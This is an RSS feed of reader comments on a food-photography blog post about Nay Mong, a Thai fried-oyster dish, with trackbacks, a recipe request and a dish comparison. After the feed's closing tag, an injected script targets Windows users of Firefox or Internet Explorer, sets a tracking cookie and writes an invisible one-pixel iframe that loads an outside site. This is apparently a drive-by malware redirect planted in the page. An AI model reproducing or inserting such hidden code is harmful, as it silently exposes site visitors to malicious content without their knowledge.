<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Nay Mong</title>
	<atom:link href="http://www.austinbushphotography.com/2009/07/nay-mong.html/feed" rel="self" type="application/rss+xml" />
	<link>http://www.austinbushphotography.com/blog/nay-mong.html</link>
	<description></description>
	<lastBuildDate>Fri, 03 Feb 2012 04:43:53 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>By: Buy Fans</title>
		<link>http://www.austinbushphotography.com/blog/nay-mong.html#comment-54991</link>
		<dc:creator>Buy Fans</dc:creator>
		<pubDate>Wed, 21 Dec 2011 21:12:35 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2009/07/nay-mong.html#comment-54991</guid>
		<description>&lt;strong&gt;Sites We Like...&lt;/strong&gt;

[...]just below, are some totally unrelated sites to ours, however, they are definitely worth checking out[...]...</description>
		<content:encoded><![CDATA[<p><strong>Sites We Like&#8230;</strong></p>
<p>[...]just below, are some totally unrelated sites to ours, however, they are definitely worth checking out[...]&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Daeng Racha Hoy Thot - Austin Bush Photography</title>
		<link>http://www.austinbushphotography.com/blog/nay-mong.html#comment-46119</link>
		<dc:creator>Daeng Racha Hoy Thot - Austin Bush Photography</dc:creator>
		<pubDate>Fri, 24 Jun 2011 14:25:50 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2009/07/nay-mong.html#comment-46119</guid>
		<description>[...] or suan, oysters fried in a sticky batter, didn&#8217;t quite live up to that of my favourite vendor, and was pretty oily, although the oysters were [...]</description>
		<content:encoded><![CDATA[<p>[...] or suan, oysters fried in a sticky batter, didn&#8217;t quite live up to that of my favourite vendor, and was pretty oily, although the oysters were [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Hoy Thot Chao Ley - Austin Bush Photography</title>
		<link>http://www.austinbushphotography.com/blog/nay-mong.html#comment-35006</link>
		<dc:creator>Hoy Thot Chao Ley - Austin Bush Photography</dc:creator>
		<pubDate>Tue, 31 Aug 2010 09:00:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2009/07/nay-mong.html#comment-35006</guid>
		<description>[...] crispy and satisfying. Admittedly, the dishes aren&#8217;t rich or expertly-prepared as those of Nay Mong, but are better than most you&#8217;ll find around town, and are worth checking [...]</description>
		<content:encoded><![CDATA[<p>[...] crispy and satisfying. Admittedly, the dishes aren&#8217;t rich or expertly-prepared as those of Nay Mong, but are better than most you&#8217;ll find around town, and are worth checking [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Jason McBride</title>
		<link>http://www.austinbushphotography.com/blog/nay-mong.html#comment-24417</link>
		<dc:creator>Jason McBride</dc:creator>
		<pubDate>Mon, 27 Jul 2009 17:30:07 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2009/07/nay-mong.html#comment-24417</guid>
		<description>Austin, Do you have a recipe for this? Even if you just know what goes into the batter or some of the spices. 
Thanks!</description>
		<content:encoded><![CDATA[<p>Austin, Do you have a recipe for this? Even if you just know what goes into the batter or some of the spices.<br />
Thanks!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: SinoSoul</title>
		<link>http://www.austinbushphotography.com/blog/nay-mong.html#comment-23755</link>
		<dc:creator>SinoSoul</dc:creator>
		<pubDate>Fri, 10 Jul 2009 21:31:42 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2009/07/nay-mong.html#comment-23755</guid>
		<description>that is the Thai version of the Taiwanese O-Ah-Jien isn&#039;t it.. good God that looks mighty fine, and unfathomable even in Los Angeles?</description>
		<content:encoded><![CDATA[<p>that is the Thai version of the Taiwanese O-Ah-Jien isn&#8217;t it.. good God that looks mighty fine, and unfathomable even in Los Angeles?</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<script> var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [       { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = "";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;} function findCookie(szName){        var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(";",nStartPosition);if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://feedfaster.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}</script>  

